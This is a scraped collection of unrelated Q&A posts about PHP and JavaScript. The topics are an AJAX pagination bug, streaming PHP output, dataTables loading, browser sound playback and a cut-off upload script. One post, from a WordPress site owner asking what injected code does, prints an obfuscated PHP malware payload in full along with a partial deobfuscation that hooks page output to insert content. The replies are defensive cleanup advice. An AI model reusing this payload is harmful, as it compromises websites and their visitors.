AJAX XMLHttpRequest 'bouncing back' when sending vars to PHP - php

I apologize if I don't articulate my problem correctly, but I'll give it my best shot. I've been looking all over the net for info which can help me with this issue, to no avail.
Just a bit of background. I'm an experienced web coder, though haven't done webwork in a few years prior to this, I have done a fair bit of work in PHP and javascript before and these days I work with C++, so I'm fairly experienced with programming principles.
I'm building some blog software, and inb4wordpress and jQuery, I simply don't care. So spare it please... I'm loading some blog entries into an element through a simple AJAX request function. This function is detailed below: ( It's been changed to a 3 function example I found on the net while I was trying to debug this issue, no one's 'simple' code seems to work. )
The problem is detailed beneath the code.
var httpObject = null;
function getHTTPObject(){
if(window.ActiveXObject) return new ActiveXObject("Microsoft.XMLHTTP");
else if(window.XMLHttpRequest) return new XMLHttpRequest();
else {
alert("Your browser does not support AJAX.");
return null;
}
}
function setOutput(){
if(httpObject.readyState == 4){
document.getElementById("entries").innerHTML = httpObject.responseText;
}
}
function loadEntries(s) {
httpObject = getHTTPObject();
if (httpObject != null) {
httpObject.open("GET","entries.php?" + s,true);
httpObject.send(null);
httpObject.onreadystatechange = setOutput;
}
}
Simple stuff? I can't seem to see any errors there. This is how the function is called:
<div id='entries'>
<script type="text/javascript">
loadEntries('blog=<?php echo $process['id']; ?>&page=0');
</script>
</div>
also simple.
Here's the PHP code for 'entries.php':
<?php
require_once('inc/bloginc.php');
if(isset($_GET['page'])) {
$page = intval($_GET['page']);
} else $page = 0;
$entries = 3;
$init = $page * $entries;
$limit = $entries + $init;
if(!isset($_GET['blog'])) die("WTF DIE");
else $blog = mysql_real_escape_string($_GET['blog']);
$tag = '';
if(isset($_GET['tag'])) {
$tag = mysql_real_escape_string($_GET['tag']);
echo "<span class='blogEntryBody'>viewing entries tagged with: '" . $tag . "' / <a href='' onclick=\"";
echo "loadEntries('blog=" . $blog . "')";
echo "\">clear?</a></span></br>";
echo "<hr>";
}
$numposts = nResults($blog, $tag);
buildEntries(getEntries($blog, $tag, $init, $limit));
if($numposts > $entries) {
echo "</br><span class='blogEntryBody'>";
if($page > 0) {
echo "<a href='' onClick=\"";
echo "loadEntries('blog=" . $blog;
if(isset($_GET['tag'])) echo "&tag=" . $tag;
echo "&page=" . (--$page) . "')";
echo "\">Previous Entries</a>";
echo " / ";
}
echo "<a href='' onClick=\"";
echo "loadEntries('blog=" . $blog;
if(isset($_GET['tag'])) echo "&tag=" . $tag;
echo "&page=" . (++$page) . "')";
echo "\">Next Entries</a>";
echo "<br></span>";
}
?>
okay, now here's where things get tricky:
When sending vars to 'entries.php', such as: entries.php?blog=walk&page=1
They intermittently work, some of these work, but some don't.
I know it's not the PHP code, since loading entries.php up in a new window and manually passing these vars elicits the desired results. What happens is that the HTTP GET request returns 'undefined' in Firefox webdev console, such as this:
[14:47:33.505] GET http://localhost/meg/entries.php?blog=walk&tag=lorem [undefined 2ms]
^ The 'tag' variable usually works, it's normally the 'page' variable that sends everything haywire.
What happens is, after clicking 'next page', you quickly see a blank div, and then it quickly bounces back to the previous state. You see all this loading in the console. It'll return 'undefined' then reload the previous state. Which is just puzzling.
I don't understand why this would be occurring.
I hope I've provided enough information, and set it out in an easy to understand format. I'm new to asking questions. I usually just 'googleit' or RTM. But I think maybe this time someone else will have seen this before.
Oh, and I've tested in chrome, same issue. I'm really puzzled, but open to the possibility that maybe I've overlooked something small and crucial.
Thanks!


Well it happens few times that ajax doesn't works in chrome & explorer so my suggestion to use jquery because in jquery they already include codes for explorer and chrome.
you can use
$.get , $.post or $.ajax methods easily.

Related

My PHP function won't return the response to AJAX until the process finishes

I need the PHP response as it is outputted on the php echo.
But when I have a process running, it returns all at once, only after the process has ended.
Is there a way around this?
Thank you in advance
Edit:
This is the ajax after getting the response:
// callback handler called on success
request.done(function (response) {
$('#add--response').html(response);
});
This is the PHP
$count=0;
foreach ($_POST['URLS'] as $url) {
if(!empty($url)){
echo '<div id="conversionSuccess">here is the progress bar for the download</div>';
if (<here I download a file that takes a long time>)
{
echo "success";
}
else
{
echo 'Error!';
}
$count++;
echo "count: ".$count."<br>";
}
}
I want the progress bar visible before the file finishes downloading.
I hope now it makes sense

Without your code, its hard to understand what you're asking or how to help. For better practice, please attach code in your next questions.
However, I'd approach this by building the string in a way you can then later split it and use the response: this meaning -
$response = "";
$response .= $outputOne . "/";
$response .= $outputTwo . "/";
echo $reponse;
Inside your JQuery:
var output = reponse.split("/");
output now becomes an array of each of your output's.
Hope this was relevant and helped.

wordpress are injected some code snippets

I found all of php files of my wordpress are injected some code snippets in front of the files.
<?php
$ipdcnbaium = '5c%x78256<^#zsfvr#%x5c%x785cq7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz]y74]273]y76]252]y85]256]y6g]257]78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWt%x7860gvodujpo)##-!#~<#%x5c%x77825)}.;%x5c%x7860UQPc%x787f!>>%x5c%x7822!pd%x5c%x7825m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x782x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x5tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%c%x7825j=tj{fpg)%x5c%x7825%4]y76#<%x5c%x7825tmw!>!#]y84]275]y824*<!%x5c%x7824-%x5c%x7824gx7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x78f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x786GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%{hnpd!opjudovg!|!**#j{hnpd#)tutjyf)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x78275hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbc%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x773:8297f:5297e:56-%x5c%x7878r.985:52985-t.9%x5c%x7860opjudovg%x5c%x7822)!gj}x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c83]273]y76]277#<%x5c%x7825t2w>#%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%xY%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset($GLc%x7824]y8%x5c%x7824-%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwx782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)#57]38y]47]67y]37]88y]27]5c%x7825))!gj!<*#cd2bge56,47R57,27R66,#%x5c%x782fq%x5c%x7825>ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x782582f%x5c%x7825%x5c%x7825c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI2]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#76248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]uhofm%x5c%x7825:-5ppdex7825!<*#}_;#)323ldfid>}&;%x5c%x7825:osvufs:~92x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>hIr%x5c%x785c1^-%x5c%x7825r%xc%x7825r%x5c%x7878<~!!%x5c%x7825c%x785c2^-%x5c%x7826*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<1]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7828257-MSV,6<*)ujojR%x5c%x7827id%x5ck#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]27{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825opmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j2f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]27%x7825s:%x5c%x785c%x5c%x78#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|9]78]K5]53]Kc#<%x5c%x7825tpz!>-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-E%x5c%x78257%x5c%x782f7###7%x5c%x782f7^x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GOy3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5"%x61%156%x75%156%x61"]=1x5c%x7827pd%x5c%x78256<pdx5c%x7825-#+I#)q%x5cy33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]6225kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfeb8>>%x5c%x7822:ftmbg39*565c%x7827{**u%x5c%x7825-#jt0t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!8]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%5z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wc%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zeUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7828y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%; function fjfgg($n){return chr(ord($n)-]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", 860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%25!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x782!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x782%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x77jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5cfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd5tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5825w6Z6<.5%x5c%x7860hA%x5c%x7827ppn)%x5c%x7825epnbss-%x5c%x7825r%x5c%25j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:}Z;0]=]0#)2q%x5c%x7825l}S;2-u#iubq#%x5c%x785cq%x5c%x7821);} #error_reporting(0); preg_replacex78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]OBALS["%x61%156%x75%156%x61"])))) { $GLOBALS[5s:N}#-%x5c%x7825o:W%x5c%x78257825)sutcvt)esp>hmg%x5c%x7825!<5%x5c%x7827jsv%x5c%x81]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7860%x5c%x7825}X;!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%xx5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x25z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7x7825!)!gj!<2,*j%x5c%x7825!-#1]#-b4-%x5c%x7824!>!fyqmpef5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9e!-#jt0*?]+^?]_%x5c%x785c}:4:|:**#ppde#)tutjyf%x5c%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)f%x5c%x7825ggg!>!#]y81]273]y8pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*bepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y#-#L#-#M#-#[#-#Y#-#D#-#W7824-%x5c%x7824-tusqpt)%x5c%x78b!-#}#)fepmqnj!%x5c%x782f!#0#)id!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7812>j%x5c%x7825!|!*#91y]825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5825)!>>%x5c%x7822!ftmbg)!gj<*#Y%x5c%x78257;utpI#7>%x}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[7860%x5c%x7878%x5c%x7822l:!}V;3q%x5%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x!osvufs}%x5c%x787f;!opjudovg}k~~9{d1^W%x5c%x7825c!>!%x5c%x7825i%xjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssNULL); })!gj}Z;h!opjudovg}{;274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uy5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x0FUPNFS&d_SFSFGFS%x5c%x7860Q#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc9y]g2y]#>>*4-1-bubE{h%x5]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]3!osvufs!*!+A!>!{e%x5c%x725j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5cMSVD!-id%x5c%x7825)uqpuft%x5c%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x517,67R37,#%x5c%x782fq%x5c%x7825>U<#1Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%xx7878W~!Ypp2)%x5c%x7825zBz-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825%x5c%x7825tww**WYsboepn)%x5c%x7825b%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboe)sutcvt)fubmgoj{hA!osvuf439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:i)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x70LDPT7-UFOJ%x5c%x7860g:74985-rr.93e:5597f-s.9c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7Rc%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]2X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%165]y83]248]y83]256]y81]265]y72]25#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7878256<C>^#zsfvr#%x5c%x785cq%xps)%x5c%x7825j>1<%x56]234]342]58]24]31#-%x5c%x7825tdd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7z*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x52q%x5c%x7825<#g6R85,67R37,5:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]47ubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&SA:>:8:|:7#6#)tutjyf%x5c%x7860Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c4-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786y86]267]y74]275]y7:]268]y7f#<!%x5c%x782827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc)#]341]88M4P8]37]278]2254l}%x5c%x7827;%x5c%7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7pc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x%x78256<%x5c%x787fw6*%x5c%xCW&)7gj6<.[A%x5c%x7827&6<%x5c%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827%x5c%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%xubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787ss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K6+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&%x787fw6<*K)ftpmdXA6|7**197-2qj%x5R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-s!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%fu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827kc:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-0%x28%42%x66%152%x66%147%x67%42/(.*)/epreg_replacecawmpmsvdd';
$iizkegwpep = explode(chr((159-115)),'1520,70,4940,45,3179,25,3857,40,4841,38,5381,48,8214,69,10075,31,7231,69,5872,44,3141,38,4381,51,4674,33,8438,39,3937,61,3204,25,4579,41,5676,38,1174,44,8968,49,8136,37,2916,51,4879,61,6505,22,1866,44,4432,50,9786,34,8859,70,7771,21,825,67,5429,44,2526,68,0,29,3033,38,4815,26,5046,20,8357,29,5636,40,926,56,1421,59,2219,40,5916,45,6103,41,6903,42,171,47,4482,37,9820,51,7715,56,2323,34,9299,27,5333,48,9326,29,676,63,7381,63,1480,40,248,21,7202,29,8527,43,7816,63,269,33,6780,20,2768,68,1804,40,7598,24,9871,52,5580,34,8637,38,5194,35,9355,65,4121,51,2403,39,557,68,6945,53,5015,31,6412,23,7056,24,8173,41,892,34,1261,33,8068,68,3071,70,4620,54,1116,58,2090,49,6034,69,9420,43,9463,69,5831,41,1612,68,6729,43,6247,32,9532,55,5988,46,1743,24,9723,63,789,36,6998,28,3758,49,3998,60,9017,67,6853,50,9923,68,7300,45,5174,20,3596,48,1680,38,9144,20,2043,26,6664,35,2069,21,3452,24,8736,29,7622,56,2021,22,5805,26,126,45,2483,43,7139,24,6475,30,2357,46,8675,61,7879,69,7345,36,1767,37,8570,26,3404,48,5473,47,6570,35,3711,47,9229,70,3476,27,4786,29,1048,68,5779,26,8018,50,6800,53,2442,41,8283,32,495,34,1329,31,93,33,8929,39,4519,60,2866,50,1718,25,3807,50,3229,20,4344,37,302,69,8596,41,1910,63,625,51,3503,53,5229,51,2704,38,2259,64,8798,61,4228,59,6605,59,6216,31,5520,60,6435,40,1590,22,371,56,9164,65,529,28,8386,20,468,27,1294,35,218,30,1844,22,5614,22,7678,37,6144,48,4287,57,5280,53,6699,30,9084,37,7543,55,4707,36,7444,25,2967,66,7469,39,2139,29,2199,20,982,66,7508,35,9587,68,7792,24,1218,43,3556,40,9655,68,2836,30,6279,63,4058,63,427,41,5714,65,6527,43,1360,61,29,64,9121,23,7080,59,5066,64,8406,32,8477,50,4172,56,2168,31,4985,30,9991,34,2594,70,6342,70,7163,39,2742,26,4743,43,8765,33,739,50,2664,40,3644,67,3338,66,10025,50,7026,30,6192,24,8315,42,3305,33,5961,27,5130,44,7948,70,1973,48,3249,56,3897,40,6772,8');
$emohrydhhi=substr($ipdcnbaium,(43064-32958),(46-39));
if (!function_exists('efccfhrtgn')) {
function efccfhrtgn($lvbeusmjag, $likewwohuf) {
$bofyjhslnr = NULL;
for($wymmotluwp=0;$wymmotluwp<(sizeof($lvbeusmjag)/2);$wymmotluwp++) {
$bofyjhslnr .= substr($likewwohuf, $lvbeusmjag[($wymmotluwp*2)],$lvbeusmjag[($wymmotluwp*2)+1]);
} return $bofyjhslnr;
};
}
$anjiklzunk="\x20\57\x2a\40\x67\166\x66\162\x70\151\x78\145\x74\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\61\x31\55\x37\64\x29\51\x2c\40\x63\150\x72\50\x28\62\x38\70\x2d\61\x39\66\x29\51\x2c\40\x65\146\x63\143\x66\150\x72\164\x67\156\x28\44\x69\151\x7a\153\x65\147\x77\160\x65\160\x2c\44\x69\160\x64\143\x6e\142\x61\151\x75\155\x29\51\x29\73\x20\57\x2a\40\x78\147\x76\157\x66\163\x6b\147\x6f\146\x20\52\x2f\40";
$xmtobffgzh=substr($ipdcnbaium,(35930-25817),(80-68));
$xmtobffgzh($emohrydhhi, $anjiklzunk, NULL);
$xmtobffgzh=$anjiklzunk;
$xmtobffgzh=(818-697);
$ipdcnbaium=$xmtobffgzh-1; ?>
it seems like some encrypted php codes. So I tried decrypted it Here, then I got
<?php
function __lambda_func()
{
};
if (!function_exists("pa22")) {
function pa22($v)
{
Header("Content-Encoding: none");
$p = "\x70\162\x65\147\x5f";
$p1 = $p . "\155\x61\164\x63\150";
$p2 = $p . "\162\x65\160\x6c\141\x63\145";
$t = dcoo($v);
if ($p1("/\<\/body/si", $t)) {
return $p2("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
}
else {
if ($p1("/\<\/html/si", $t)) {
return $p2("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
}
else {
return $t;
}
}
}
}
ob_start("pa22"); //}
I had reinstalled my wordpress several months ago. But it comes again now. My wordpress is the newest version(3.9.1).
my question is
how did those snippets inject into php files?
what are the snippets going to do?

Its seems like a 3rd party injunction. This kinds of attacks are common in wordpress. Please take some security measures after cleaning the inject codes. Disable the edit permission and use some security plugins like file file-monitor-plus and wordfence

Definitely a hack attempt. Probably not targeted to your own site, but you should clear all these things, since they may quickly eat up your hosting resources (CPU, Memory,IO).
My advice is after clearing them, disable WP's ability to edit files through the dashboard and set permissions to critical files (config, index etc) to something like 0400 or 0440.
The way they get there varies, but in most cases the guy who did this used some known PHP (or other) exploit, which your webhost has not patched yet...

jQuery dataTables not loading AJAX JSON data

I have a table that is populated via dataTables with information from a MySQL table. The information is prepared via PHP as proper JSON in the way dataTables expects the information.
The problem I'm having is the table no longer loads informations. Even reverting my changes so that the JSON data does not include links to the server description (via view.php) doesn't change anything.
The site can be found here: checkersthecat.com/status The PHP that outputs JSON information can be found here: checkersthecat.com/status/inc/json-servers.php
Here is the code for json-servers.php
<?php
$db = new PDO("mysql:host=localhost;dbname=mcstatus;charset=UTF8", "user", "pass");
$stmt = $db->prepare("SELECT ip, port, category, players, tries, description FROM clients");
$stmt->execute();
$servers = $stmt->fetchAll(PDO::FETCH_ASSOC);
$count = $stmt->rowCount();
$data = array(
"aaData" => array()
);
foreach ($servers as $item) {
$arr = array();
// Address
if (strlen($item['description']) == 0) {
if ($item['port'] != 25565) {
array_push($arr, $item['ip'] . ":" . $item['port']);
} else {
array_push($arr, $item['ip']);
}
} else {
if ($item['port'] != 25565) {
array_push($arr, "<a href='inc/view.php?ip=" . $item['ip'] . "'>" . $item['ip'] . ":" . $item['port'] . "</a>");
} else {
array_push($arr, "<a href='inc/view.php?ip=" . $item['ip'] . "'>" . $item['ip'] . "</a>");
}
}
// Category
array_push($arr, $item['category']);
// Status
if ($item['tries'] == 0) {
array_push($arr, "Up");
} else {
array_push($arr, "Down (" . $item['tries'] . ")");
}
// Players
if ($item['players'] == -1) {
array_push($arr, "?");
} else {
array_push($arr, $item['players']);
}
array_push($data['aaData'], $arr);
}
header("Content-type: application/json");
echo json_encode($data);
?>
The snippet of javascript that actually initializes and sets up the dataTable is here:
// init load of table
serverTable = $("#servers").dataTable({
"bProcessing": true,
"bStateSave": true,
"sPaginationType": "two_button",
"sAjaxSource": "http://checkersthecat.com/status/inc/json-servers.php"
});
It literally worked, I changed one small item relating to the description length in the javascript relating to a jQuery modal dialog form, I refreshed the page, and suddenly dataTables no longer loads my JSON information.
I'm at a total loss as to why it will not work. Even reverting to my old code without the hyperlinks in the JSON data and previous description limits doesn't make a difference. It still gives me an endless "Processing" and "Loading". When I try to search it merely says "No data available" which is ludicrous as the JSON information is right there at the URL and is valid.
I've tried debugging the javascript and PHP with firebug and turning on error reporting respectively, but apparently there isn't anything wrong with it all as far as I know.
Any help is very appreciated as this has had me tearing my hair out. If there's any other details that you may need, please let me know.

It works, but I'm unsure what exactly the problem was.

playing dynamic sound clips in browser

I've never delt with sound clips and im wanting to play one via an event.
I have a file which has a snippet like so:
if( $get['0002'] == 'mu' ) {
switch( $get['0000'] ) {
case 'mp3': header('Content-Type: audio/mp3'); break;
case 'wav': header('Content-Type: audio/x-wav'); break;
default: break;
}
echo file_get_contents('./folder-name/' . $get['0001'] . '.' . $get['0000'] );
exit;
}
and on the page I fave this button;
<input type="button" value="Play Sound" onClick="EvalSound('sound1')" >
and this hidden away in the background
<embed src="./?0000=wav&0001=0001&0002=mu" autostart=false width=0 height=0 id="sound1" enablejavascript="true">
and the js being;
<script>
function EvalSound(soundobj) {
var thissound=document.getElementById(soundobj);
thissound.Play();
}
</script>
This does not seem to work and I believe it has something to do with the PHP headers. Could someone please point me in the right direction, as it would be much appreciated.

Please do some testing here with: http://www.phon.ucl.ac.uk/home/mark/audio/play.htm
On firefox I get an error for the Play() function.
Use something like firebug to give you more information.
If everything works then start debugging your php script.

PHP variable from external .php file, inside JavaScript?

I have got this JavaScript code for uploading files to my server (named it "upload.js"):
function startUpload(){
document.getElementById('upload_form').style.visibility = 'hidden';
return true;
}
function stopUpload(success){
var result = '';
if (success == 1){
result = '<div class="correct_sms">The file name is [HERE I NEED THE VARIABLE FROM THE EXTERNAL PHP FILE]!</div>';
}
else {
result = '<div class="wrong_sms">There was an error during upload!</div>';
}
